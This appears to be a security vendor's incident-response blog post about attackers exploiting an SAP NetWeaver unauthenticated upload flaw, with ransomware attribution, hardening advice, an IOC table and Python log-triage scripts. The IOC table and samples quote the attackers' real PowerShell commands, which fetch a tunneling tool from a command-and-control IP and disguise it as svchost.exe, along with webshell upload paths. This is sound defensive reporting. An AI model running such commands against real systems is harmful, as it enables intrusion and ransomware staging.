CVE-2025-31324 hit the security world like a tsunami – an easily exploitable SAP vulnerability affecting enterprise environments across the globe. But while most assumed its exploitation began post-disclosure, new evidence suggests otherwise.
During an incident response led by OP Innovate for a major global enterprise, we uncovered proof that this vulnerability was actively exploited nearly three weeks before it was made public. While recent articles point the finger towards China-Linked APTs, we identified communication with known Cobalt Strike C2 infrastructure and IP addresses linked directly to Qilin, a notorious Russian-speaking Ransomware-as-a-Service group.
What started as a routine post-disclosure investigation quickly evolved into a rare glimpse of zero-day exploitation in the wild – and possibly, early access to a vulnerability that hadn’t yet made headlines.
In this blog, we’ll walk you through:
- How the attack unfolded weeks before disclosure
- What we found during forensic analysis
- Why we believe this ties into broader Qilin ransomware operations
- What defenders can learn from this breach to prepare for future threats exploiting enterprise middleware like SAP
- What organizations using SAP should do to stay safe
CVE-2025-31324: Simple Exploit, Serious Impact
CVE-2025-31324 is a critical vulnerability affecting SAP NetWeaver Visual Composer, a component commonly deployed in large enterprise environments. The flaw lies in the /developmentserver/metadatauploader endpoint, which fails to properly enforce authentication and authorization. This allows an unauthenticated attacker to easily upload arbitrary files, including web shells, to the server.
SAP assigned this a CVSS score of 10.0, reflecting its trivial exploitation path and severe impact, including the potential for remote code execution and full system compromise.
What makes this vulnerability especially dangerous is its accessibility:
- No authentication required
- Attack surface exposed via standard HTTP(S)
- Commonly deployed in enterprise SAP environments
By the time SAP released an emergency patch and CISA added it to the KEV catalog, exploitation was underway – and, as we discovered, not just after the disclosure.
As a byproduct of the incident response, OP Innovate developed and deployed a dedicated WASP scanner to detect insecure deserialization vulnerabilities like CVE-2025-31324. This scanner is currently operational and actively scanning for affected SAP NetWeaver components.
Inside the Breach: From Minus-One to Zero
OP Innovate’s investigation revealed two separate exploitations of CVE-2025-31324 within a major enterprise environment. The first occurred nearly three weeks before the vulnerability was publicly disclosed. The second happened shortly after the CVE was published. Although both incidents relied on the same unauthenticated file upload flaw in SAP NetWeaver, the threat infrastructure and observed behavior varied significantly.
During the investigation, our team identified a publicly available Proof of Concept (POC) exploit for CVE-2025-31324 hosted on GitHub. The POC specifically targeted the vulnerable /developmentserver/metadatauploader endpoint and demonstrated how to upload arbitrary .jsp files, without authentication. This code closely matched the method used in the attack, helping us validate the exploitation chain and confirm that the threat actor leveraged this exact vulnerability in the wild.
Pre-Disclosure Exploitation
Initial Access:
Weeks before CVE-2025-31324 appeared in public advisories, an attacker exploited the vulnerable Metadata Uploader endpoint within SAP NetWeaver. The most probable access vector was a misconfigured load balancer that exposed internal services to the internet.
The attacker uploaded several JSP-based webshells to the SAP IRJ directory:
\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\
Webshells like random12.jsp, xxkmszdm.jsp, and gpfmddkh.jsp were automatically compiled and enabled full remote code execution.
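The upload-then-invoke pattern described above is easy to spot in HTTP access logs once you know what to look for. The following Python triage script is an added example, not code from the original investigation or from OP Innovate's WASP scanner. It flags any request to /developmentserver/metadatauploader (POST as an upload attempt, GET as a probe), escalates to a critical finding when the same client IP then requests a .jsp directly under /irj/root/, and separately flags JSP names matching the random eight-letter pattern seen in this incident. The log lines are constructed samples in a Common Log Format shape; the real SAP ICM log layout is not assumed, so adapt LOG_RE to your format.

```python
import re
from dataclasses import dataclass

# Constructed sample access log lines (CLF-style) for illustration; not real
# traffic from the incident. 203.0.113.0/24, 198.51.100.0/24 and 192.0.2.0/24
# are documentation address ranges.
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [01/Apr/2025:10:02:11 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 512
203.0.113.10 - - [01/Apr/2025:10:02:15 +0000] "GET /irj/root/xxkmszdm.jsp HTTP/1.1" 200 84
198.51.100.7 - - [01/Apr/2025:10:05:00 +0000] "GET /irj/portal HTTP/1.1" 200 4096
203.0.113.10 - - [01/Apr/2025:10:06:40 +0000] "GET /irj/root/random12.jsp HTTP/1.1" 200 120
198.51.100.7 - - [01/Apr/2025:10:07:01 +0000] "GET /irj/root/index.jsp HTTP/1.1" 200 900
192.0.2.55 - - [01/Apr/2025:11:30:09 +0000] "GET /irj/root/gpfmddkh.jsp HTTP/1.1" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOADER_PATH = "/developmentserver/metadatauploader"
IRJ_JSP_RE = re.compile(r"^/irj/root/(?P<name>[^/]+\.jsp)$")
RANDOM_NAME_RE = re.compile(r"^[a-z]{8}\.jsp$")   # e.g. xxkmszdm.jsp, gpfmddkh.jsp


@dataclass
class Finding:
    client_ip: str
    severity: str   # medium | high | critical
    reason: str
    log_line: str


def parse_line(line: str):
    """Parse one CLF-style line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze_access_log(log_text: str) -> list:
    """Return findings for metadata uploader hits and suspicious /irj/root/ JSPs."""
    findings = []
    uploader_clients = set()   # clients that have already touched the vulnerable endpoint
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, method = rec["ip"], rec["method"]
        path = rec["target"].split("?", 1)[0]   # drop any query string before matching

        if path == UPLOADER_PATH:
            uploader_clients.add(ip)
            sev = "high" if method == "POST" else "medium"   # POST = upload attempt, GET = probe
            findings.append(Finding(ip, sev, f"{method} to Visual Composer metadata uploader", raw))
            continue

        m = IRJ_JSP_RE.match(path)
        if not m:
            continue
        name = m.group("name")
        if ip in uploader_clients:
            # Same client reached the uploader and then a JSP in the web root:
            # the upload-then-invoke chain described in the incident.
            findings.append(Finding(ip, "critical",
                                    f"{name} requested after uploader access (webshell chain)", raw))
        elif RANDOM_NAME_RE.match(name):
            findings.append(Finding(ip, "high",
                                    f"random eight-letter JSP name {name} under /irj/root/", raw))
    return findings


def highest_severity_by_client(findings: list) -> dict:
    """Collapse findings to the worst severity seen per client IP."""
    rank = {"medium": 1, "high": 2, "critical": 3}
    worst = {}
    for f in findings:
        if f.client_ip not in worst or rank[f.severity] > rank[worst[f.client_ip]]:
            worst[f.client_ip] = f.severity
    return worst


if __name__ == "__main__":
    results = analyze_access_log(SAMPLE_ACCESS_LOG)
    for f in results:
        print(f"[{f.severity:8}] {f.client_ip}: {f.reason}")
    print(highest_severity_by_client(results))
```

A 404 on a random-named JSP (the last sample line) is still worth a finding: it can indicate an attacker re-checking a shell that the EDR has already quarantined, which is exactly the situation described in this incident.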
Once in, the attacker attempted to:
- Initiate outbound communication with Cobalt Strike C2 infrastructure (180[.]131[.]145[.]73, 184[.]174[.]96[.]74)
- Download and stage rs64c.exe, a reverse SOCKS5 tunneling tool, from http[:]//184[.]174[.]96[.]74/rs64c.exe
- Save the payload locally as svchost.exe and prepare for execution
What We Saw:
The attacker’s use of IP address 184[.]174[.]96[.]74 and the tool rs64c.exe closely matches infrastructure and tools previously associated with Qilin, a Russian-speaking Ransomware-as-a-Service (RaaS) group. This indicates the activity was likely part of an initial access attempt, potentially intended to prepare the ground for a future ransomware attack or to sell access to other threat actors.
What Failed:
- The Firewall blocked outbound C2 traffic
- The EDR quarantined all downloaded payloads
- Neither lateral movement nor persistence mechanisms were observed
- The attacker attempted to clean up artifacts by issuing Remove-Item commands for files like random12.jsp and ESC.exe, but the files had already been quarantined by EDR, rendering the cleanup ineffective.
Post-Disclosure Exploitation
Initial Access:
Shortly after CVE-2025-31324 was disclosed publicly, a second exploitation attempt was observed. The attacker again leveraged the same SAP endpoint to upload webshells. However, there is no evidence linking this activity to the pre-disclosure attacker, as no overlapping infrastructure or tools were observed.
What the Attacker Did:
New webshells – such as ran_new.jsp, bdtzvjzm.jsp, and decoxfiv.jsp – were deployed, followed by attempts to download executables via PowerShell:
- https://bashupload.com/bSLrt/test.exe → temp.exe
- https://bashupload.com/HUbaF/test.exe → temp_new.exe
What Failed:
- All download attempts were blocked or quarantined
- No execution, lateral movement, or communication with external infrastructure occurred
- Deployed files were manually removed, likely by the attacker
Outcome
In both incidents, the attacker successfully gained initial access and remote code execution by exploiting CVE-2025-31324. However, post-exploitation efforts failed completely in both cases:
- No payloads were executed
- No data was exfiltrated
- No movement beyond the SAP servers occurred
Defensive controls – including network-layer blocking and endpoint containment – prevented what may have been a planned ransomware delivery. The pre-disclosure incident bore the hallmarks of Qilin-linked infrastructure, while the post-disclosure event remains unattributed but similarly neutralized.
The Qilin Connection: Exploiting SAP, Staging for Ransomware
The pre-disclosure activity observed in this incident shows clear overlap with tactics and infrastructure linked to Qilin, a Russian-speaking Ransomware-as-a-Service (RaaS) group active since 2022. Qilin operates through an affiliate model, frequently leveraging Initial Access Brokers (IABs), commodity tooling, and staged infrastructure to prepare environments for high-impact ransomware deployment.
Qilin’s Tactics
According to public threat intelligence from multiple sources, Qilin affiliates typically follow a consistent operational pattern:
- Initial access via exposed web applications or phishing
- Deployment of tunneling utilities or frameworks like Cobalt Strike
- Network scoping, privilege escalation, and lateral movement
- Delayed ransomware deployment and data extortion
This incident mirrors several elements of that playbook – including unauthenticated access via a known (or, at the time, not-yet-public) CVE, staging of remote access tools, and outbound communication with known infrastructure.
Supporting Evidence from Official Intelligence
Prior to public awareness of this specific intrusion, Indonesia’s National Cyber and Crypto Agency (BSSN) published an official IOC bulletin – IOC_QILIN Ransomware v1.3, dated April 15, 2025 – listing infrastructure indicators linked to Qilin ransomware activity. This bulletin included:
- IP address: 184[.]174[.]96[.]70
- File path: C:\ProgramData\rs64c.exe
- IP address: 180[.]131[.]145[.]73
Each of these indicators corresponds closely with evidence from this incident:
- The attacker downloaded the tunneling tool rs64c.exe from http[:]//184[.]174[.]96[.]74/rs64c.exe — an IP in the same 184[.]174[.]96[.]0/24 subnet as the Qilin-linked IP 184[.]174[.]96[.]70
- The binary was written to the exact same path listed in the bulletin: C:\ProgramData\rs64c.exe
- The attacker attempted to reach 180[.]131[.]145[.]73, which is explicitly listed in the BSSN bulletin as Qilin infrastructure
These direct overlaps – including exact file paths and IP matches – support a high-confidence assessment that the infrastructure leveraged in this incident aligns with known Qilin operations.
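The correlation reasoning above (exact IP and path matches as high confidence, a neighbour in the same /24 as a weaker but still notable signal) is the kind of logic worth automating in a SIEM. The script below is an added example, not code from the original report or from the BSSN bulletin. It takes the two BSSN indicator IPs quoted above, builds their enclosing /24 networks, and walks a constructed outbound connection log, reporting exact hits as high confidence and same-subnet hits as medium confidence. The host names, the unrelated destinations, and the SERVER_HOSTS set (hosts that should never initiate internet connections, per the recommendation to watch servers that are not expected to originate such traffic) are assumptions made for the example.

```python
import ipaddress

# Indicators taken from the BSSN IOC_QILIN v1.3 bulletin as cited in this report.
QILIN_IOC_IPS = {
    "184.174.96.70": "BSSN IOC_QILIN v1.3",
    "180.131.145.73": "BSSN IOC_QILIN v1.3",
}

# Constructed sample of outbound connection records (firewall/proxy style):
# (source host, destination IP, destination port, firewall action).
# The two Qilin-related destinations are the ones reported in this incident;
# the host names and the other destinations are made up for the example.
SAMPLE_CONNECTIONS = [
    ("sap-pp1-j01", "180.131.145.73", 443, "deny"),
    ("sap-pp1-j01", "184.174.96.74", 80, "deny"),
    ("sap-pp1-j01", "198.51.100.20", 443, "allow"),
    ("web-proxy-01", "184.174.96.70", 443, "deny"),
    ("file-srv-02", "203.0.113.9", 445, "allow"),
]

# Assumed set of hosts that have no business initiating connections to the internet.
SERVER_HOSTS = {"sap-pp1-j01", "file-srv-02"}


def build_subnets(ioc_ips: dict, prefix: int = 24) -> dict:
    """Map each indicator's enclosing /prefix network to the bulletin it came from."""
    return {
        ipaddress.ip_network(f"{ip}/{prefix}", strict=False): source
        for ip, source in ioc_ips.items()
    }


def match_ioc(dest_ip: str, ioc_ips: dict, subnets: dict):
    """Return (confidence, reason) for an exact or same-subnet hit, else None."""
    if dest_ip in ioc_ips:
        return "high", f"exact match to {ioc_ips[dest_ip]}"
    addr = ipaddress.ip_address(dest_ip)
    for net, source in subnets.items():
        if addr in net:
            return "medium", f"inside {net}, same subnet as an indicator from {source}"
    return None


def correlate(connections, ioc_ips=QILIN_IOC_IPS, server_hosts=SERVER_HOSTS, prefix=24):
    """Walk connection records and emit an alert for every IOC or same-subnet hit."""
    subnets = build_subnets(ioc_ips, prefix)
    alerts = []
    for host, dest, port, action in connections:
        hit = match_ioc(dest, ioc_ips, subnets)
        if hit is None:
            continue
        confidence, reason = hit
        # A denied connection is still an alert: the firewall stopped the C2
        # traffic in this incident, but the attempt itself is the evidence.
        alerts.append({
            "host": host, "dest": dest, "port": port, "action": action,
            "confidence": confidence, "reason": reason,
            "server_initiated": host in server_hosts,
        })
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_CONNECTIONS):
        flag = " (server-initiated)" if a["server_initiated"] else ""
        print(f"{a['confidence']:6} {a['host']} -> {a['dest']}:{a['port']} [{a['action']}] {a['reason']}{flag}")
```

Treat the same-subnet match as a triage prompt rather than a block decision: a /24 may be shared with unrelated tenants at the same hosting provider, which is why the bulletin's exact IP and the incident's 184[.]174[.]96[.]74 are reported at different confidence levels.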
Use of Cobalt Strike
Cobalt Strike remains a standard tool in post-exploitation phases of many RaaS operations, including Qilin. Its modular, red-team-oriented architecture makes it ideal for maintaining persistence, conducting reconnaissance, and staging ransomware payloads. While beacon sessions were blocked in this case, the attacker’s preparation and infrastructure use were consistent with a pre-ransomware staging phase typical of Qilin affiliates.
Recommendations
Based on the observed tactics and mitigated actions during the incident, the following recommendations are aimed at reducing exposure to similar threat activity and improving organizational resilience against exploitation and ransomware staging:
- Patch and Restrict Exposure of SAP NetWeaver Systems
  - Immediately apply the vendor patch addressing CVE-2025-31324 on all affected SAP NetWeaver instances.
  - Implement strict network segmentation to ensure SAP interfaces are not publicly accessible unless absolutely necessary.
  - Review reverse proxy/load balancer configurations (e.g., F5) to avoid accidental exposure of internal endpoints.
- Web Application Hardening
  - Enable web application firewalls (WAFs) or filtering controls that block unauthorized file uploads and exploit attempts.
  - Regularly audit for the presence of custom endpoints (like /metadatauploader) that may bypass authentication or input validation.
- Endpoint and Malware Defense
  - Maintain EDR coverage on all internet-facing and business-critical systems. Ensure automatic quarantine is enabled and up-to-date detection signatures are deployed.
  - Block execution from temporary paths such as C:\ProgramData\ and other commonly abused directories via group policy or EDR rules.
  - Prevent execution of unsigned or suspicious binaries downloaded via PowerShell or other scripting interfaces.
- Network Controls and C2 Disruption
  - Enforce egress filtering on firewall and proxy layers to block outbound connections to untrusted IPs and domains.
  - Block traffic to known Cobalt Strike and reverse proxy tools (e.g., rs64c.exe) using threat intelligence feeds (e.g., ThreatFox, AbuseIPDB).
  - Monitor for unusual outbound communication to rare external IPs, particularly from servers not expected to initiate such traffic.
- PowerShell Monitoring and Restrictions
  - Enable PowerShell Script Block Logging and Constrained Language Mode on servers.
  - Alert on suspicious PowerShell activity, especially:
    - Invoke-WebRequest or wget
    - Downloading to uncommon paths
    - Use of Remove-Item for cleanup
- Incident Readiness and Response
  - Review and test incident response plans, especially for pre-ransomware detection.
  - Ensure your SOC and IR teams are trained to identify early-stage intrusion activity, even before payload delivery (e.g., C2 staging, tunneling tools).
  - Establish a process to cross-reference alerts with public IOCs, such as those shared in bulletins like BSSN IOC_QILIN v1.3.
- Threat Intelligence Integration
  - Subscribe to and regularly review government and vendor-published IOC feeds.
  - Integrate IOC correlation into SIEM and SOAR workflows, ensuring real-time blocking or escalation on high-fidelity matches.
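Once Script Block Logging is on, the three PowerShell alert conditions listed above (download cmdlets, downloads to uncommon paths, Remove-Item cleanup) can be expressed as a small scoring function over Event ID 4104 records. The script below is an added example written for this post, not tooling from the original investigation. Its first two sample script blocks are the command lines from the IOC table of this report; the Remove-Item line, the benign line, the host names and the STAGING_DIRS list are constructed for the example. It also flags a download written under a core Windows binary name outside System32, which is how the rs64c.exe payload was saved as svchost.exe in this incident. The cmdlet aliases in DOWNLOAD_RE (iwr, irm, wget, curl) are the standard Windows PowerShell aliases.

```python
import re

# Constructed sample of PowerShell Script Block Logging events (Event ID 4104).
# The first two ScriptBlockText values are the command lines listed in the
# IOC table of this report; the remaining events are made up for the example.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "sap-pp1-j01",
     "ScriptBlockText": r"powershell.exe /c invoke-webrequest http://184.174.96.74/rs64c.exe -OutFile c:\programdata\svchost.exe"},
    {"EventID": 4104, "Computer": "sap-pp1-j01",
     "ScriptBlockText": r"powershell Invoke-WebRequest -Uri https://bashupload.com/bSLrt/test.exe -OutFile C:\ProgramData\temp.exe"},
    {"EventID": 4104, "Computer": "sap-pp1-j01",
     "ScriptBlockText": r"Remove-Item \usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\random12.jsp"},
    {"EventID": 4104, "Computer": "admin-ws-03",
     "ScriptBlockText": r"Get-ChildItem C:\Users | Sort-Object LastWriteTime"},
    {"EventID": 4103, "Computer": "admin-ws-03",          # not a script block event; ignored
     "ScriptBlockText": r"Invoke-WebRequest https://example.com"},
]

# Download cmdlets, their built-in aliases, and the .NET WebClient download methods.
DOWNLOAD_RE = re.compile(
    r"\b(invoke-webrequest|iwr|wget|curl|invoke-restmethod|irm|start-bitstransfer|downloadfile|downloadstring)\b")
OUTFILE_RE = re.compile(r"-outfile\s+(\S+)")
REMOVE_RE = re.compile(r"\b(remove-item|rm|del|erase)\b")
WEBSHELL_EXT_RE = re.compile(r"\.(jsp|aspx?|php)\b")
# Writable directories abused for staging in this report plus common equivalents (lower-cased).
STAGING_DIRS = (r"c:\programdata", r"c:\windows\temp", r"c:\users\public", r"\usr\sap")
# Core Windows binaries that should only ever live under System32.
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}


def score_script_block(text: str) -> list:
    """Return the list of reasons a script block looks like payload staging or cleanup."""
    t = text.lower()
    reasons = []
    if DOWNLOAD_RE.search(t):
        reasons.append("download cmdlet")
        m = OUTFILE_RE.search(t)
        if m:
            path = m.group(1).strip("'\"")
            if path.startswith(STAGING_DIRS):
                reasons.append(f"download written to staging directory: {path}")
            name = path.rsplit("\\", 1)[-1]
            if name in SYSTEM_BINARY_NAMES and not path.startswith(r"c:\windows\system32"):
                reasons.append(f"system binary name {name} outside System32 (masquerading)")
    if REMOVE_RE.search(t) and (WEBSHELL_EXT_RE.search(t) or any(d in t for d in STAGING_DIRS)):
        reasons.append("deletion of a file in a web root or staging directory (cleanup)")
    return reasons


def triage(events: list) -> list:
    """Score every 4104 event and return only the flagged ones with a severity."""
    flagged = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        reasons = score_script_block(ev["ScriptBlockText"])
        if not reasons:
            continue
        severity = "high" if len(reasons) >= 2 else "medium"
        flagged.append({"computer": ev["Computer"], "severity": severity, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['severity']:6} {hit['computer']}: {'; '.join(hit['reasons'])}")
```

The Remove-Item line scores only medium on its own, which is deliberate: cleanup is ordinary administrative activity, and it becomes interesting when it targets a .jsp in the SAP web root or a file in a staging directory, as it did here.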
Unique Indicators of Compromise (IOCs)
| IOC Type | IOC | Hash type | Description | Notes |
|---|---|---|---|---|
| File Hash | D1C43F8DB230BDF18C61D672440EBA12 | MD5 | Old executable test.exe | Downloaded to: C:\ProgramData\temp.exe; download URL: https://bashupload.com/bSLrt/test.exe |
| File Hash | 6914B1F5B6843341FAFDFAA9D57818B9 | MD5 | New executable test.exe (same filename, different hash and URL) | Downloaded to: C:\ProgramData\temp_new.exe; download URL: https://bashupload.com/HUbaF/test.exe |
| IP Address | http[:]//184[.]174[.]96[.]70 | | Known Qilin IOC; used as command-and-control or payload host. | |
| IP Address | http[:]//184[.]174[.]96[.]74 | | Staging IP used to host the rs64c.exe reverse tunneler. | |
| IP Address | 180[.]131[.]145[.]73 | | Command-and-control IP associated with Qilin; pinged from the target system. | |
| URL | http[:]//184[.]174[.]96[.]70/rs64c.exe | | Download URL for the reverse SOCKS5 tunneler (IOC-listed host). | |
| URL | http[:]//184[.]174[.]96[.]74/rs64c.exe | | Download URL for the reverse SOCKS5 tunneler (IOC-listed host). | |
| Command Line | powershell.exe /c invoke-webrequest http://184.174.96.74/rs64c.exe -OutFile c:\programdata\svchost.exe | | PowerShell command used to download rs64c.exe to a writable directory. | |
| Command Line | powershell Invoke-WebRequest -Uri https://bashupload.com/bSLrt/test.exe -OutFile C:\ProgramData\temp.exe | | Command used to download a malicious executable via the Bashupload service. | |
| Command Line | PowerShell Remove-Item | | Cleanup command used to remove dropped files. | Used to delete ESC.exe and random12.jsp |
| Path | \usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\ | | SAP webroot path used by the attacker to upload malicious JSP files. | Used for uploading malicious JSP files |
| Directory | \Device\HarddiskVolume12\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\ | | Directory where uploaded JSPs were auto-compiled to .class files, which is evidence of exploitation. | SAP class file path; the presence of compiled classes proves the uploaded JSPs were invoked |
| File Names | random12.jsp, duchyofn.jsp, rbekqaun.jsp, rwlrqhrj.jsp, xxkmszdm.jsp, gpfmddkh.jsp, bdtzvjzm.jsp, decoxfiv.jsp, zdulvrqu.jsp, ran_new.jsp | | Automatically compiled by the SAP server, generating corresponding .class files inside the \irj\work\ folder. | Randomized JSP webshells with eight-character names for stealth, uploaded to the SAP root path |
| File Names | JEE_jsp_bdtzvjzm_1743883325986.class | | Auto-compiled JSP class file resulting from an uploaded webshell. | |
| File Names | test.exe | | Malicious executable downloaded from Bashupload and staged in ProgramData. | Dropped in SAP root path |
| File Names | ESC.exe | | Malicious binary dropped via webshell, later deleted via PowerShell. | Dropped in SAP root path |
Protect Your Systems with OP Innovate
As cyber threats grow more sophisticated, organizations need trusted partners who can deliver both proactive defense and rapid response. OP Innovate helps businesses stay secure by combining immediate incident response services with advanced vulnerability detection.
Our dedicated WASP scanner continuously monitors SAP environments for critical weaknesses like insecure deserialization flaws, including CVE-2025-31324, helping organizations fix issues before attackers can exploit them. In parallel, our Incident Response (IR) teams are ready to rapidly contain and investigate any breach, minimizing disruption and restoring security.